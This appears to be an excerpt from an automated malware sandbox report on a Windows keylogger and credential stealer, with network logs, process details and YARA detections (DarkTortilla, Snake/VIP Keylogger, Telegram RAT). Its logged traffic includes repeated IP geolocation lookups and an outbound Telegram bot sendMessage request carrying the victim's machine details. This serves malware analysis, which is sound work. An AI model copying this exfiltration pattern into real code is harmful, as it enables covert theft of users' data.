2025-01-11 05:14:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49982	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:35 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 05:14:35 UTC	853	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887264 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EjgJ3GCYyBKk6QcfiY7CsyOUPcX4pJADGmDFZvM%2BPX1X4wolydGjsbRaoUzmBR6f4VesYe5k2lcTTk0BSMoROucz20XVL1fy5v6YRmX%2F4CP5DJeguTvxBsmVAQ5rerZMMoZPiAU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026c958de50f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1635&rtt_var=618&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1764350&cwnd=221&unsent_bytes=0&cid=6281c889a0e96f4d&ts=114&x=0"
2025-01-11 05:14:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49984	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:14:37 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887266 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lhs2KtyVsoXBVMk3GHEY8Y8kciNnZ3Egs5DSjGs7HBV56DNX0K3qN9plv8ibqC1pPeWkMWRTSNtvAMCd6kP0nLXGK%2F82RkNMeG0zsPA%2BGtDiBorAWwoxp%2F7uJnLs9EeriQ7JH6cV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026c9cefad43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1558&rtt_var=797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1211618&cwnd=203&unsent_bytes=0&cid=a861f451ab0ec3d6&ts=140&x=0"
2025-01-11 05:14:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49986	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 05:14:38 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887267 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1mw6ZxI6uFWnGbBn8clZx%2BTP1h56l8GwqNiMTIcM0WF%2F1fCGngwRKWg54KOoy8uspLN8N1yZglFW7PaSSn6IvsqXY75XocQYplPpEYf1Yn1UjbVmhGO5%2FZ3ANhFQvA0Ru5rmr0I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026ca47af9424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1547&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1830721&cwnd=248&unsent_bytes=0&cid=e6683c6d2f2c7301&ts=144&x=0"
2025-01-11 05:14:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49988	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:14:39 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887268 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJFCBYMH%2FFLncTOZzNeYH5Q%2BUSiiSotS81unUPRKGvuztK2WwGXkDbiKrEvJKyku7vi1%2F6PucLYoH0aQPc9ZObVUQqHy4AjOPijtHoF3pQ%2Fcn1inS3S9WjoXpcO1RpMLPaSP62mT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026cabca62424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1583&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1812538&cwnd=248&unsent_bytes=0&cid=f88a08b6c4e0d12a&ts=135&x=0"
2025-01-11 05:14:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49990	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:40 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 05:14:40 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887269 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oH9b8y8xQIchCB37GEIPSbB3XZPxLZgTFTePJRj%2FbwtB7snI6xH0Q4LimNG9Yh1iePE6l6H%2B0RFpF9t6b%2FyvXvrBwSKtBBylM83elhJ813a3i051qUKm8eFl0m%2BTXVESQofTpM2o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026cb35f41c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1455&rtt_var=565&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1902280&cwnd=181&unsent_bytes=0&cid=90bfd3be5b5b522c&ts=158&x=0"
2025-01-11 05:14:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49992	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:41 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 05:14:41 UTC	869	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887270 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=691vwRps8VJ%2FMKDTwLAlzwNvQOMLNCN0fDiDIC2Tas6PvLcEe%2B2L3%2FxiOlqUdklb0%2FKlrkvZkPhUcCewE8%2Bv%2BVtW%2Bog%2FxCY%2FzPvgG0neugbYrEJPV4aK0w1bh%2FCk1KsS0w81ehPU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026cbb1cb943b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1546&rtt_var=588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1846932&cwnd=203&unsent_bytes=0&cid=3a245d01de89929d&ts=151&x=0"
2025-01-11 05:14:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49994	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:42 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:14:43 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887272 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wixOWX76u1OCwPc2c4KhplT6WqC2y2tW%2Bn3PAnVhcq6LaJl2zxYtWoqsRIVjA7mthzOUXW%2BgSnmB3TgQWledTnfqiLXUltw9H4%2FxEbjY4IdOEzU4UNuUhUJ24O7%2Bl83Y93%2BQhLVF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026cc2a803729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=1972&rtt_var=778&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1480730&cwnd=169&unsent_bytes=0&cid=57aecedb33f5629f&ts=147&x=0"
2025-01-11 05:14:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49996	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:44 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 05:14:44 UTC	863	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887273 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YBNCaO8y5rkQ%2B2O7uav2VKJC1LRw01ULfJzp6RmyOtpVlLTFW%2FrsCv3j06Pvkgo5tBhEFE1yhFCy%2FOtQAlnZgHXxRWZ5NoDf02SuffrrBg%2BCYWcU%2F%2FuTP7CD1pE%2BZWozlgPmNwpx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026cca7f70c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1475&rtt_var=563&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1926121&cwnd=181&unsent_bytes=0&cid=170eb98fa1a658d3&ts=150&x=0"
2025-01-11 05:14:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49997	149.154.167.220	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:44 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-11 05:14:45 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 05:14:45 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 05:14:45 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	00:13:24
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\5qJ6QQTcRS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5qJ6QQTcRS.exe"
Imagebase:	0xd00000
File size:	838'144 bytes
MD5 hash:	78668D52E5B092184A4B8E6788713B3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1965003803.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:13:59
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
